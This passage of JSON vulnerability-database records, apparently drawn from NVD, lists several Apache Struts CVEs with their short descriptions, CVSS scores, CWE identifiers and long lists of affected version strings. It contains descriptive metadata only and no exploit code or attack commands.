"cpe:/a:apache:struts:2.3.8", "cpe:/a:apache:struts:2.0.9", "cpe:/a:apache:struts:2.0.7", "cpe:/a:apache:struts:2.1.0", "cpe:/a:apache:struts:2.3.12", "cpe:/a:apache:struts:2.0.11.2", "cpe:/a:apache:struts:2.0.13", "cpe:/a:apache:struts:2.0.10", "cpe:/a:apache:struts:2.1.3", "cpe:/a:apache:struts:2.3.14.1", "cpe:/a:apache:struts:2.3.16", "cpe:/a:apache:struts:2.3.7", "cpe:/a:apache:struts:2.0.8", "cpe:/a:apache:struts:2.3.16.1", "cpe:/a:apache:struts:2.0.12", "cpe:/a:apache:struts:2.0.5", "cpe:/a:apache:struts:2.1.5", "cpe:/a:apache:struts:2.3.1.2", "cpe:/a:apache:struts:2.2.1", "cpe:/a:apache:struts:2.3.1.1", "cpe:/a:apache:struts:2.1.1", "cpe:/a:apache:struts:2.0.14", "cpe:/a:apache:struts:2.0.11.1", "cpe:/a:apache:struts:2.3.4.1", "cpe:/a:apache:struts:2.0.11", "cpe:/a:apache:struts:2.0.1", "cpe:/a:apache:struts:2.2.3", "cpe:/a:apache:struts:2.1.8", "cpe:/a:apache:struts:2.3.14", "cpe:/a:apache:struts:2.1.8.1", "cpe:/a:apache:struts:2.0.2"], "id": "CVE-2014-0116", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0116", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:struts:2.3.16.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.13:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-29T10:46:43", "description": "ParametersInterceptor in Apache Struts before 2.3.20 does not properly restrict access to the getClass method, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via a crafted request. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0094.", "cvss3": {}, "published": "2014-04-29T10:37:00", "type": "cve", "title": "CVE-2014-0112", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0094", "CVE-2014-0112"], "modified": "2019-08-12T21:15:00", "cpe": [], "id": "CVE-2014-0112", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0112", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-09-29T10:48:40", "description": "CookieInterceptor in Apache Struts before 2.3.20, when a wildcard cookiesName value is used, does not properly restrict access to the getClass method, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via a crafted request. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0094.", "cvss3": {}, "published": "2014-04-29T10:37:00", "type": "cve", "title": "CVE-2014-0113", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0094", "CVE-2014-0113"], "modified": "2019-08-12T21:15:00", "cpe": [], "id": "CVE-2014-0113", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0113", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-06-23T14:19:29", "description": "In Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1, using an unintentional expression in a Freemarker tag instead of string literals can lead to a RCE attack.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-09-20T17:29:00", "type": "cve", "title": "CVE-2017-12611", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12611"], "modified": "2019-08-12T21:15:00", "cpe": ["cpe:/a:apache:struts:2.1.8.1", "cpe:/a:apache:struts:2.2.3", "cpe:/a:apache:struts:2.0.11.1", "cpe:/a:apache:struts:2.3.25", "cpe:/a:apache:struts:2.3.28", "cpe:/a:apache:struts:2.2.1.1", "cpe:/a:apache:struts:2.0.1", "cpe:/a:apache:struts:2.3.24.3", "cpe:/a:apache:struts:2.3.28.1", "cpe:/a:apache:struts:2.3.21", "cpe:/a:apache:struts:2.3.24.2", "cpe:/a:apache:struts:2.3.1", "cpe:/a:apache:struts:2.1.3", "cpe:/a:apache:struts:2.1.5", "cpe:/a:apache:struts:2.5.3", "cpe:/a:apache:struts:2.3.13", "cpe:/a:apache:struts:2.1.1", "cpe:/a:apache:struts:2.3.14.2", "cpe:/a:apache:struts:2.1.4", "cpe:/a:apache:struts:2.0.11.2", "cpe:/a:apache:struts:2.3.11", "cpe:/a:apache:struts:2.3.7", "cpe:/a:apache:struts:2.3.14", "cpe:/a:apache:struts:2.5", "cpe:/a:apache:struts:2.3.30", "cpe:/a:apache:struts:2.0.6", "cpe:/a:apache:struts:2.3.1.2", "cpe:/a:apache:struts:2.3.17", "cpe:/a:apache:struts:2.1.0", "cpe:/a:apache:struts:2.3.8", "cpe:/a:apache:struts:2.5.8", "cpe:/a:apache:struts:2.5.9", "cpe:/a:apache:struts:2.2.1", "cpe:/a:apache:struts:2.5.5", "cpe:/a:apache:struts:2.0.7", "cpe:/a:apache:struts:2.3.16.2", "cpe:/a:apache:struts:2.0.4", "cpe:/a:apache:struts:2.3.14.1", "cpe:/a:apache:struts:2.0.11", "cpe:/a:apache:struts:2.3.20", "cpe:/a:apache:struts:2.3.26", "cpe:/a:apache:struts:2.3.3", "cpe:/a:apache:struts:2.3.4.1", "cpe:/a:apache:struts:2.0.2", "cpe:/a:apache:struts:2.0.3", "cpe:/a:apache:struts:2.0.10", "cpe:/a:apache:struts:2.3.14.3", "cpe:/a:apache:struts:2.5.6", "cpe:/a:apache:struts:2.3.10", "cpe:/a:apache:struts:2.5.2", "cpe:/a:apache:struts:2.5.7", "cpe:/a:apache:struts:2.0.5", "cpe:/a:apache:struts:2.3.16.3", "cpe:/a:apache:struts:2.0.13", "cpe:/a:apache:struts:2.3.22", "cpe:/a:apache:struts:2.3.1.1", "cpe:/a:apache:struts:2.3.20.2", "cpe:/a:apache:struts:2.3.16.1", "cpe:/a:apache:struts:2.3.4", "cpe:/a:apache:struts:2.0.14", "cpe:/a:apache:struts:2.5.4", "cpe:/a:apache:struts:2.3.29", "cpe:/a:apache:struts:2.3.20.1", "cpe:/a:apache:struts:2.3.5", "cpe:/a:apache:struts:2.3.6", "cpe:/a:apache:struts:2.1.6", "cpe:/a:apache:struts:2.3.15.3", "cpe:/a:apache:struts:2.3.27", "cpe:/a:apache:struts:2.3.16", "cpe:/a:apache:struts:2.3.9", "cpe:/a:apache:struts:2.3.31", "cpe:/a:apache:struts:2.5.10", "cpe:/a:apache:struts:2.0.8", "cpe:/a:apache:struts:2.3.32", "cpe:/a:apache:struts:2.3.19", "cpe:/a:apache:struts:2.3.33", "cpe:/a:apache:struts:2.0.12", "cpe:/a:apache:struts:2.3.12", "cpe:/a:apache:struts:2.1.8", "cpe:/a:apache:struts:2.3.23", "cpe:/a:apache:struts:2.3.15", "cpe:/a:apache:struts:2.3.15.2", "cpe:/a:apache:struts:2.1.2", "cpe:/a:apache:struts:2.2.3.1", "cpe:/a:apache:struts:2.3.15.1", "cpe:/a:apache:struts:2.0.9", "cpe:/a:apache:struts:2.5.1"], "id": "CVE-2017-12611", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12611", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:struts:2.3.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5:beta2:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.28.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.20.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.25:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.28:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.27:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.30:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.31:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.20.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.29:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.32:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.21:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.24.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5:beta3:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5:beta1:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.26:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.33:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.24.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-06T14:52:56", "description": "Apache Struts 2.3.1.2 and earlier, 2.3.19-2.3.23, provides interfaces that do not properly restrict access to collections such as the session and request collections, which might allow remote attackers to modify run-time data values via a crafted parameter to an application that implements an affected interface, as demonstrated by the SessionAware, RequestAware, ApplicationAware, ServletRequestAware, ServletResponseAware, and ParameterAware interfaces. NOTE: the vendor disputes the significance of this report because of an \"easy work-around in existing apps by configuring the interceptor.\"", "cvss3": {}, "published": "2012-01-08T17:55:00", "type": "cve", "title": "CVE-2011-5057", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-5057"], "modified": "2019-08-12T21:15:00", "cpe": [], "id": "CVE-2011-5057", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-5057", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2023-06-03T14:34:40", "description": "Apache Struts 2 before 2.3.29 and 2.5.x before 2.5.1 allow attackers to have unspecified impact via vectors related to improper action name clean up.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-10-03T15:59:00", "type": "cve", "title": "CVE-2016-4436", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4436"], "modified": "2017-08-09T01:29:00", "cpe": ["cpe:/a:apache:struts:2.3.14.3", "cpe:/a:apache:struts:2.0.11.2", "cpe:/a:apache:struts:2.3.15.3", "cpe:/a:apache:struts:2.0.0", "cpe:/a:apache:struts:2.3.16.3", "cpe:/a:apache:struts:2.3.14.1", "cpe:/a:apache:struts:2.3.14.2", "cpe:/a:apache:struts:2.5", "cpe:/a:apache:struts:2.0.7", "cpe:/a:apache:struts:2.3.1", "cpe:/a:apache:struts:2.3.15.1", "cpe:/a:apache:struts:2.3.4", "cpe:/a:apache:struts:2.3.20", "cpe:/a:apache:struts:2.3.24.3", "cpe:/a:apache:struts:2.3.16.2", "cpe:/a:apache:struts:2.3.20.3", "cpe:/a:apache:struts:2.3.16.1", "cpe:/a:apache:struts:2.2.3", "cpe:/a:apache:struts:2.0.6", "cpe:/a:apache:struts:2.0.9", "cpe:/a:apache:struts:2.3.28", "cpe:/a:apache:struts:2.3.3", "cpe:/a:apache:struts:2.2.1", "cpe:/a:apache:struts:2.0.2", "cpe:/a:apache:struts:2.1.8", "cpe:/a:apache:struts:2.3.16", "cpe:/a:apache:struts:2.3.7", "cpe:/a:apache:struts:2.3.4.1", "cpe:/a:apache:struts:2.3.28.1", "cpe:/a:apache:struts:2.0.11.1", "cpe:/a:apache:struts:2.0.14", "cpe:/a:apache:struts:2.0.3", "cpe:/a:apache:struts:2.3.1.2", "cpe:/a:apache:struts:2.3.15", "cpe:/a:apache:struts:2.0.4", "cpe:/a:apache:struts:2.3.14", "cpe:/a:apache:struts:2.0.12", "cpe:/a:apache:struts:2.3.24", "cpe:/a:apache:struts:2.3.20.1", "cpe:/a:apache:struts:2.3.12", "cpe:/a:apache:struts:2.2.3.1", "cpe:/a:apache:struts:2.3.24.1", "cpe:/a:apache:struts:2.3.8", "cpe:/a:apache:struts:2.1.8.1", "cpe:/a:apache:struts:2.0.11", "cpe:/a:apache:struts:2.3.15.2", "cpe:/a:apache:struts:2.2.1.1", "cpe:/a:apache:struts:2.0.8", "cpe:/a:apache:struts:2.0.1", "cpe:/a:apache:struts:2.3.1.1", "cpe:/a:apache:struts:2.1.6", "cpe:/a:apache:struts:2.0.5"], "id": "CVE-2016-4436", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4436", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:struts:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.24.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.24:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5:beta1:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5:beta3:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.28.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.28:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.20.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.20.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5:beta2:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.24.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-08-13T04:10:47", "description": "The token check mechanism in Apache Struts 2.0.0 through 2.3.4 does not properly validate the token name configuration parameter, which allows remote attackers to perform cross-site request forgery (CSRF) attacks by setting the token name configuration parameter to a session attribute.", "cvss3": {}, "published": "2012-09-05T23:55:00", "type": "cve", "title": "CVE-2012-4386", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, 